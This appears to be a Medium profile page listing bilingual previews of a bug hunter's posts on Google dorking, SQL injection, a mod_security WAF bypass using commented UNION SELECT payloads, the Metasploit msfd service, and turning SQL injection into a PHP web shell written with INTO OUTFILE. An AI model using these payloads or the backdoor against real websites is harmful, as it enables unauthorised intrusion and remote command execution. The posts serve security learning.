Sign in

My name is Luis Madero (_Y000! _) I am a computer systems engineer, bug hunter and above all a lover of web security, in this writing I would like to touch on the topic of xss injections from a theoretical point of view until I see some examples of injections along the history.


What is dorking?

Google hacking or Dorking is nothing more than a way of looking for things a little more specialized, by the name “Google Hacking” you can give the impression that it is only used in google, but that is not correct. Dorking is nothing more than an advanced search where we use operators that function as a filter to direct the search directly to where we want, we also use symbols to search for exact words or phrases. This will help us to search almost any search engine that we find on the internet.

Importance

Knowing a little about “Dorking” helps us…


sql injection | LaptrinhX

In this writing I will leave some tips for sql injections, where I will try to explain only specific points.

First we will talk about how to find a vulnerable page thanks to google hacking.

Dorks


sql injection | LaptrinhX

En este escrito dejaré algunos tips para inyecciones sql, en donde trataré de explicar solamente puntos específicos.

Primero hablaremos de como encontrar una página vulnerable gracias a google hacking.

Dorks


In this writing I would like to show you a somewhat peculiar case with which I came across testing a website.

This is an sql injection where I could bypass the “mod_security” waf.
When I start the sql injection test I realize that the website is using that waf.

We get the error when using a simple:

site/ejemplo?parameter=-1+union+selec+1,2,3,4,5,6,7+--+

Now, I’m not going to lie to you, just by encoding the payload with comments, I was able to bypass the waf filter.

site/ejemplo?parameter=-1+/*!50000union*/+/*!50000selec*/+1,2,3,4,5,6,7+--+


En este escrito me gustaría enseñarles un caso algo peculiar con el que me encontré testeando un sitio web.

Se trata de una inyección sql en donde pude bypassear el waf “mod_security”.

Al iniciar el el testeo de inyección sql me doy cuenta que el sitio web esta usando ese waf.

nos aparece el error al usar un simple:

site/ejemplo?parameter=-1+union+selec+1,2,3,4,5,6,7+--+

Ahora, no les voy a mentir, con el simple hecho de codificar el payload con comentarios, pude bypassear el filtro del waf.

site/ejemplo?parameter=-1+/*!50000union*/+/*!50000selec*/+1,2,3,4,5,6,7+--+


msfd — Provides an instance of msfconsole that remote clients can connect to

root@kali:~# msfd -h

Usage: msfd <options>

OPTIONS:

-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-q Do not print the banner on startup
-s Use SSL

https://tools.kali.org/exploitation-tools/metasploit-framework

Msfd allows us to connect to a metasploit session no matter what machine we are on, just by having the…


Para empezar, primero tenemos que hablar del servicio “Msfd”

msfd — Provides an instance of msfconsole that remote clients can connect to

root@kali:~# msfd -h

Usage: msfd <options>

OPTIONS:

-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-q Do not print the banner on startup
-s Use SSL

https://tools.kali.org/exploitation-tools/metasploit-framework

Msfd nos permite conectarnos a una sesión de metasploit sin importar…


In this case we are going to take advantage of a sql injection error to be able to “jump” to other vulnerabilities.

For this we have to have write permissions and know the path where the server is mounted, they can do it with an @@datadir, in this case I have the path on the error screen

After having the path, what we are going to do is inject the shell, in this case it is a simple backdoor in php:

‘<? php system ($ _ GET [“cmd”]); ?> ‘

We are going to inject it using:

INTO + OUTFILE…


En este caso vamos a aprovechar un error de sql inyection para poder “saltar” a otras vulnerabilidades.

Después de tener la ruta, lo que vamos a hacer es inyectar la shell, en este caso es una simple backdoor en php:

‘<?php system($_GET[“cmd”]); ?>’

Lo vamos a inyectar usando:

INTO+OUTFILE+’ruta/nombre.php’

Inyectan y se nos cargara el archivo en el server, ahora accedemos.

_Y000_

Hola, Bienvenido a mi perfil de Medium! Soy Y000! 😊 ¿Quién soy? 🤔 Bueno… soy yo jaja soy solo un apasionado por la seguridad informatica.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store